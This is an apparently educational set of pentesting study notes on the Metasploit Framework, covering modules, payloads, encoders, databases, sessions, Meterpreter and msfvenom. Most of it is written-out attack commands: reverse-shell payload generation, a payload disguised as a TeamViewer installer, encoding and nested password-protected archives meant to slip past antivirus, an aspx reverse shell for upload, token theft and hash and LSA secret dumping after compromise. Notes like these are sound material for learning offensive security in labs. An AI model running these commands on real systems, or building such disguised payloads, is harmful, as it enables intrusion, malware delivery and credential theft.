- Introduction to Metasploit
- Modules
- Targets
- Payloads
- Encoders
- Databases
- Plugins & Mixins
- Sessions
- Meterpreter
- Writing and Importing Modules
- Introduction to MSFVenom
- Firewall and IDS/IPS Evasion
Metasploit Project
- Ruby-based modular pentesting platform for exploit development (includes Metasploit Pro - commercial version). -
Metasploit Framework
- includes tools to test vulnerabilities, enumerate & exploit; includes modules of actual exploits & can be accessed bymsfconsole
. -
architecture includes modules, plugins, scripts and tools. -
MSF engagement structure:
- Enumeration
- Preparation
- Exploitation
- Privilege Escalation
- Post-Exploitation
Modules are prepared scripts with specific purpose and function for exploits.
Syntax -
<index no.> <type>/<os>/<service>/<name>
We can search for modules in
using specific tags - runhelp search
for more info.msfconsole search eternalromance search eternalromance type:exploit # more specific use 0 # from matching modules, use the one with index 0 options # we need to set required options info # shows module info set RHOSTS options # now the value has changed # we can use setg - setting global value of option # set other options before running module run # exploit # this gives us a meterpreter shell shell # launches shell
Targets - unique OS identifiers, matching specific OS versions for exploits.
# in msfconsole # if we have selected module already options # shows module options show targets # exploit targets list set target 5 # sets target with index 5 # if unset, metasploit will choose automatically info # this also includes targets
Payloads - modules that aid exploit module in returning a shell to attacker.
Types of payload modules in MSF:
Singles - contains exploit & entire shellcode for selected task; self-contained, but large (no
in payload name) -
Stagers - work with Stage payloads to perform specific task; Stager waits on attacker machine, ready to establish connection to victim once stage is run; smaller, more reliable
Stages - payload components downloaded by Stagers
Staged payloads:
- Modularized exploitation process
- For AV/IPS evasion
- Stage0 - initial shellcode sent over network to victim; to initialize connection back to attacker (reverse connection)
- After stable communication established, attacker will send bigger payload stages for shell access (Stage1)
- Meterpreter payload - specific payload that uses DLL injection; offers inbuilt commands
# in msfconsole show payloads # lists all payloads # if exploit module selected, lesser payloads will be shown # search for payloads grep meterpreter show payloads grep meterpreter grep reverse_tcp show payloads set payload 2 # based on index, it selects payload show options # view parameters for payload ifconfig # view LHOST IP address set LHOST set RHOSTS run # gives meterpreter shell help # shows all commands in meterpreter shell shell # creates channel and gives command prompt
Encoders are used to make payloads compatible with different processor architectures (x64, x86, sparc, ppc & mips), and used for AV evasion too; they are also used to remove hexadecimal opcodes (aka bad characters) from payload.
SGN (Shikata Ga Nai) is one of the more popular encoding schemes.
# generating payload without encoding msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -f perl # generating payload with encoding msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai # generating payload with multiple iterations of same encoding scheme msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe # we can use msf-virustotal to analyze payloads
# in msfconsole set payload 15 # if we want to select encoder for existing payload show encoders
Databases are used to keep track of results and exploit module parameters.
# check if postgresql is up for msfdb to work sudo service postgresql status # start service sudo systemctl start postgresql # initiate db sudo msfdb init # if this gives an error, update metasploit # and initiate db again # check status sudo msfdb status # run msfdb sudo msfdb run # starts msfconsole help database # shows all database options db_status # shows current status of db # workspaces can be used to segregate projects or scans workspace # shows available workspace list workspace -a Target_1 # adds a new workspace workspace Target_1 # now we can use this workspace workspace # shows list along with asterisk for currently used one workspace -h # help options # we can import scan results in workspace # like nmap scans, preferred in xml format db_import Target.xml # auto-filled by import hosts services # the hosts and services can be customized as well # alternatively, we can use nmap from msfconsole db_nmap -sV -sS hosts services # to backup our data db_export -f xml backup.xml creds -h # shows creds gathered while interacting with target loot -h # shows owned services and users # and hash dumps
Plugins are 3rd party software integrated inside MSF.
ls /usr/share/metasploit-framework/plugins # lists all available plugins msfconsole load nessus # load any plugin nessus_help # we can install new plugins as well # if we have a .rb file, we can just copy it to plugins folder # and relaunch msfconsole to check
Mixins (feature of Ruby language) - classes that act as methods for use by other classes, without having to be the parent class.
We can run several modules using sessions - these can be switched between and backgrounded or turned into jobs.
sessions # lists active sessions # we can background the session # using Ctrl+Z or 'background' command in Meterpreter shell # to interact with a session based on index session -i 1 # if we are running an exploit under a port # and we need the port for another module # then we cannot terminate using Ctrl+C # we would need to use jobs jobs -h # help for jobs # we can run an exploit as a background job exploit -j jobs -l # list running jobs
Meterpreter payload - specific, multi-faceted, extensible payload - uses DLL injection and resides in memory of victim, leaving no traces on hard drive.
When Meterpreter payload is sent & run on target, we get a Meterpreter shell.
# inside meterpreter shell help # get list of all commands getuid # get user details # migrate process to user with more privilege ps # process list steal_token 1836 # where 1836 is PID of process with privileged user getuid # privileged user # we can try for more privesc bg # background the session # back in normal msfconsole search local_exploit_suggester use 0 show options set SESSION 1 run # this recon module shows multiple options # we can try the exploits suggested use exploit/windows/local/ms15_051_client_copy_images show options set session 1 set LHOST tun0 run # we get meterpreter shell getuid # privesc hashdump # dump hashes lsa_dump_sam lsa_dump_secrets
We can install custom exploits in Metasploit - ExploitDB offers exploits ready for MSF (we can use MSF tag to search).
msfconsole search nagios # exploit not installed locally # in another tab searchsploit nagios3 searchsploit -t Nagios3 --exclude=".py" # we need to get .rb file # download the .rb file # and paste it in the correct directory cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb msfconsole -m /usr/share/metasploit-framework/modules # back in msfconsole reload_all # reload all modules # now we can use the newly loaded exploit
MSFVenom is used to craft payloads for different target host architectures.
nmap -sV -T4 -p- ftp # anon ftp access # it has aspnet_client msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1337 -f aspx > reverse_shell.aspx # generates aspx payload # which can be uploaded # listener will get reverse shell if payload is triggered on web service msfconsole -q use multi/handler set LHOST set LPORT 1337 run # trigger payload to get reverse shell # we can use local_exploit_suggester
Endpoint protection - any local device/service with sole purpose of protecting single host on network; usually comes in form of software packs for AV.
Perimeter protection - physical/virtual devices on network perimeter edge; provides network access from public (outside) to private (inside).
Security policies - similar to ACLs; allow/deny statements for network traffic.
Multiple methods can be used to match an event with a security policy entry, such as signature-based detection, heuristic detection, stateful protocol analysis detection, and live-monitoring & alerting (SOC-based).
Evasion techniques:
Simply encoding payloads using different schemes with iterations is not enough
Network-based IDS/IPS can be taken care of as
can tunnel AES-encrypted communication -
We can use executable templates to obfuscate our payload, creating a backdoored executable:
msfvenom windows/x86/meterpreter_reverse_tcp LHOST= LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
Archives can be used as well to attempt to bypass AV signatures:
msfvenom windows/x86/meterpreter_reverse_tcp LHOST= LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5 # we can use the rar utility for archiving wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz tar -xzvf rarlinux-64-612.tar.gz && cd rar rar a ~/test.rar -p ~/rest.js # remove rar extension mv test.rar test # archive payload again rar a test2.tar -p test mv test2.rar test2 # final payload
Packers can be used as well - payload is packed together with an executable program and decompression code in a single file